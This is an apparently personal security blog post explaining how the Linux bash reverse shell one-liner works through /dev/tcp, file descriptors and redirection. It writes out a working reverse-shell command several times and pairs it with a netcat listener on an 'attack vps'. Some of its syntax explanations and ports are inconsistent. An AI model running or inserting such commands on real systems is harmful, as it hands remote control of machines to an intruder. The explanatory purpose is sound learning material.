所有的授权实战入侵网站已添加“如何入侵”标签,在侧边栏的归档中选择“如何入侵”即可查看所有文章

MENU

The commands of reverse shell

April 18, 2023 • Read: 779 • 常山阅读设置

The commands of reverse shell

I read an answer about Linux commands on zhihu, which details stdin, stdout, stderr and redirection. When I finished reading, I found that I could not understand the meaning of the Linux command in the reverse shell. So I wirte this article.

I introduced the reverse shell before. At that time, I just learned hack, so in that article, I just briefly introduced the shell, but with the further study, I think it's necessary to understand the reverse shell again.

we can reverse shell with bash -i >& /dev/tcp/192.168.0.1/8080 0>&1, this commands allowed display on prot 8080 of 192.168.0.1. But why? Maybe this article can solve this problem.

Everything is a file

In the reverse shell, it embodies the concept of everything is a file. /dev/tcp is a special file, through this file, we can send requests to the specified IP/domain and port. When this file is opened(the file isn't real), a socket connection is established. So /dev/tcp/192.168.0.1/8080 means this host has established a socket connection with prot 8080 of 192.168.0.1. Although the connection is established, but why the commands are displayed on screen of 192.168.0.1?

Stdin, stdout and stderr

stdin, stdout and stderr are all file descriptors. In Linux, stdin is number zero, and stdout is number one, stderr is number two. When we get Linux up, these three file descriptors will be started. we can get stdin throuth the keyborad and see stdout\stderr on the display. Usually stdout and stderr are displayed on the display, but if it's to be output to a file or other device, we need use redirection.

Redirection

Redirection is a concept in the Shell. Through redirection, it's to be output to a file or other device. In Shell, < and << are called input redirection. > and >> are called output redirection.

Input redirection

command 0< file means that we redirect file to command. Of course, we can omit zero.

cat.png

Output redirection

command >1 file means that we redirect the output of command to file. Also, this number is omiited.

echo.png

We can also redirect sdterr to stdout, such as command 2>&1 file or command >& file

Reverse shell

bash -i can create an interactive terminal. When we use nc -lvp 4444 on attack vps and use bash -i >& /dev/tcp/192.168.0.1/8080 0>&1 on attacked vps, we can send command by attack vps and execute the command on attacked vps. at the same time, the results of the attacked vps can be got on the attack vps.

The bash -i >& /dev/tcp/192.168.0.1/8080 0>&1 is written as bash -i > /dev/tcp/192.168.0.1/8080 0>&1 2>&1.The output of interactive terminal of attacked vps redirected to prot 8080 of 192.168.0.1, 0>&1 and 2>&1 means that the input of attack vps redirected to the interactive terminal and that the error of attacked vps redirected to port 8080 of 192.168.0.1.

This is the reverse shell.

Archives QR Code Tip
QR Code for this page
Tipping QR Code